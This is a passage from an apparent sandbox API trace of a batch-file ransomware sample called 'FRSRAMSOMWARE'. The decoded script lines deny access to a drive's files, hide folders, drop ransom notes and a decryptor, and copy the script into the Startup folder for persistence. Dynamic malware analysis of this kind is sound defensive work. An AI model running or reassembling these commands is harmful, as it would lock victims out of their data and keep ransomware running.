lpDistanceToMoveHigh=0x0) returned 0x51b [0138.491] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.491] GetFileType (hFile=0x2b8) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0138.491] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0138.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0138.491] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.491] GetFileType (hFile=0x2b8) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0138.491] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0138.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0138.491] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.491] GetFileType (hFile=0x2b8) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0138.492] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0138.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0138.492] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.492] GetFileType (hFile=0x2b8) returned 0x1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0138.492] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0138.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0138.492] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.492] GetFileType (hFile=0x2b8) returned 0x1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0138.492] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0138.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0138.492] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.492] GetFileType (hFile=0x2b8) returned 0x1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0138.492] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0138.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0138.492] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.492] GetFileType (hFile=0x2b8) returned 0x1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0138.492] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.492] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0138.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0138.493] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.493] GetFileType (hFile=0x2b8) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0138.493] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0138.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0138.493] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.493] GetFileType (hFile=0x2b8) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0138.493] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0138.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0138.493] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.493] GetFileType (hFile=0x2b8) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0138.493] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0138.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0138.493] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.493] GetFileType (hFile=0x2b8) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0138.493] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0138.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0138.493] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0138.493] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.494] GetFileType (hFile=0x2b8) returned 0x1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0138.494] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0138.494] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0138.494] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.494] GetFileType (hFile=0x2b8) returned 0x1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0138.494] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0138.494] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0138.494] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.494] GetFileType (hFile=0x2b8) returned 0x1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0138.494] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0138.494] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0138.494] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.494] GetFileType (hFile=0x2b8) returned 0x1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0138.494] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0138.494] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0138.494] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.494] GetFileType (hFile=0x2b8) returned 0x1 [0138.494] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0138.495] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0138.495] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0138.495] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.495] GetFileType (hFile=0x2b8) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0138.495] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0138.495] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0138.495] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.495] GetFileType (hFile=0x2b8) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0138.495] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0138.495] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0138.495] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.495] GetFileType (hFile=0x2b8) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0138.495] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0138.495] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0138.495] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.495] GetFileType (hFile=0x2b8) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0138.495] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0138.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0138.496] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.496] GetFileType (hFile=0x2b8) returned 0x1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0138.496] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0138.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0138.496] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.496] GetFileType (hFile=0x2b8) returned 0x1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0138.496] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0138.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0138.496] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.496] GetFileType (hFile=0x2b8) returned 0x1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0138.496] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0138.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 